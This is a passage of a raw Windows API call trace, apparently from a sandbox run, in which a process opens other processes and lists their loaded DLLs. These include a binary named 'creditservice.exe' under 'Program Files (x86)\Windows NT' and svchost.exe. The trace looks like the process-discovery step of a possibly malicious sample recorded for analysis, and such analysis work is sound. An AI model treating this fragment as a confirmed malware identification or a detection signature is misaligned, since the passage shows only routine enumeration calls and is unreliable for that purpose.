hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.633] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2685f10, cb=0x18 | out: lpmodinfo=0x2685f10*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.633] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.634] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.634] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x26880e0, cb=0x18 | out: lpmodinfo=0x26880e0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.635] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.635] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa4c) returned 0x218 [0053.637] EnumProcessModules (in: hProcess=0x218, lphModule=0x268a7f0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x268a7f0, lpcbNeeded=0x41eb20) returned 1 [0053.637] GetModuleInformation (in: hProcess=0x218, hModule=0x9e0000, lpmodinfo=0x268aa60, cb=0x18 | out: lpmodinfo=0x268aa60*(lpBaseOfDll=0x9e0000, SizeOfImage=0x17000, EntryPoint=0x9e14a1)) returned 1 [0053.637] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x9e0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="creditservice.exe") returned 0x11 [0053.638] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x9e0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\creditservice.exe" (normalized: "c:\\program files (x86)\\windows nt\\creditservice.exe")) returned 0x33 [0053.638] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x268cc90, cb=0x18 | out: lpmodinfo=0x268cc90*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.638] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.638] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.639] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x268ee68, cb=0x18 | out: lpmodinfo=0x268ee68*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.639] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.640] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.640] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2691028, cb=0x18 | out: lpmodinfo=0x2691028*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.640] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.641] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.641] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x26931f8, cb=0x18 | out: lpmodinfo=0x26931f8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.642] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.642] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x218 [0053.643] EnumProcessModules (in: hProcess=0x218, lphModule=0x2695908, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2695908, lpcbNeeded=0x41eb20) returned 1 [0053.645] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x2695b78, cb=0x18 | out: lpmodinfo=0x2695b78*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0053.648] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0053.648] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0053.648] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0053.648] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24a6bc8, cb=0x18 | out: lpmodinfo=0x24a6bc8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.648] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.649] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.649] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24a8d88, cb=0x18 | out: lpmodinfo=0x24a8d88*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.649] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.650] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.650] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24aaf58, cb=0x18 | out: lpmodinfo=0x24aaf58*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.651] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.651] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24ad128, cb=0x18 | out: lpmodinfo=0x24ad128*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.652] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.652] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.653] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24af340, cb=0x18 | out: lpmodinfo=0x24af340*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.653] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.654] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.654] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24b1500, cb=0x18 | out: lpmodinfo=0x24b1500*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.655] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.655] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.656] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca20000, lpmodinfo=0x24b36c0, cb=0x18 | out: lpmodinfo=0x24b36c0*(lpBaseOfDll=0x7fefca20000, SizeOfImage=0x14000, EntryPoint=0x7fefca2101c)) returned 1 [0053.656] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca20000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rpcepmap.dll") returned 0xc [0053.657] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca20000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcepmap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll")) returned 0x20 [0053.657] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x24b5890, cb=0x18 | out: lpmodinfo=0x24b5890*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0053.658] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0053.659] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0053.659] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x24b7af8, cb=0x18 | out: lpmodinfo=0x24b7af8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0053.660] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0053.661] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0053.661] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x24b9cb8, cb=0x18 | out: lpmodinfo=0x24b9cb8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0053.662] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0053.663] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0053.664] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x24bbe78, cb=0x18 | out: lpmodinfo=0x24bbe78*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0053.664] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0053.665] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0053.666] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x24be038, cb=0x18 | out: lpmodinfo=0x24be038*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0053.667] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0053.668] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0053.669] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca40000, lpmodinfo=0x24c0208, cb=0x18 | out: lpmodinfo=0x24c0208*(lpBaseOfDll=0x7fefca40000, SizeOfImage=0x81000, EntryPoint=0x7fefca4cec8)) returned 1 [0053.669] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca40000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rpcss.dll") returned 0x9 [0053.670] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca40000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")) returned 0x1d [0053.671] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24c23c8, cb=0x18 | out: lpmodinfo=0x24c23c8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0053.672] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0053.673] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.674] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x24c4598, cb=0x18 | out: lpmodinfo=0x24c4598*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0053.675] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0053.676] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0053.677] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x24c6758, cb=0x18 | out: lpmodinfo=0x24c6758*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0053.678] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0053.679] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0053.680] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x24c8a48, cb=0x18 | out: lpmodinfo=0x24c8a48*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0053.681] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0053.682] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0053.684] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x24cac08, cb=0x18 | out: lpmodinfo=0x24cac08*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0053.685] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0053.686] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0053.687] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x24ccdb8, cb=0x18 | out: lpmodinfo=0x24ccdb8*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0053.688] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0053.690] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0053.691] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24cef78, cb=0x18 | out: lpmodinfo=0x24cef78*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0053.692] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="user32.dll") returned 0xa [0053.693] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0053.694] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x24d1138, cb=0x18 | out: lpmodinfo=0x24d1138*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0053.696] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0053.697] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0053.699] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x24d32f8, cb=0x18 | out: lpmodinfo=0x24d32f8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0053.700] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0053.702] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0053.703] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x24d54a8, cb=0x18 | out: lpmodinfo=0x24d54a8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0053.704] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0053.706] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0053.707] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x24d7668, cb=0x18 | out: lpmodinfo=0x24d7668*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0053.708] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0053.710] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0053.711] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x24d9828, cb=0x18 | out: lpmodinfo=0x24d9828*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0053.712] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0053.714] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0053.716] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x24db9e8, cb=0x18 | out: lpmodinfo=0x24db9e8*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0053.717] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0053.718] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0053.720] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x24ddbb8, cb=0x18 | out: lpmodinfo=0x24ddbb8*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0053.721] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0053.723] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0053.725] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x24dfd78, cb=0x18 | out: lpmodinfo=0x24dfd78*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0053.726] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0053.728] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0053.730] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x24e1f48, cb=0x18 | out: lpmodinfo=0x24e1f48*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0053.732] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0053.733] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0053.735] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x24e4108, cb=0x18 | out: lpmodinfo=0x24e4108*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0053.740] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0053.742] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0053.744] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x24e62c8, cb=0x18 | out: lpmodinfo=0x24e62c8*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0053.746] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0053.747] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0053.749] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x24e8488, cb=0x18 | out: lpmodinfo=0x24e8488*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0053.751] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0053.753] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0053.755] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x24ea870, cb=0x18 | out: lpmodinfo=0x24ea870*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0053.756] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0053.758] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0053.760] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x24eca58, cb=0x18 | out: lpmodinfo=0x24eca58*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0053.762] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0053.764] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x783720, nSize=0x800 | out: 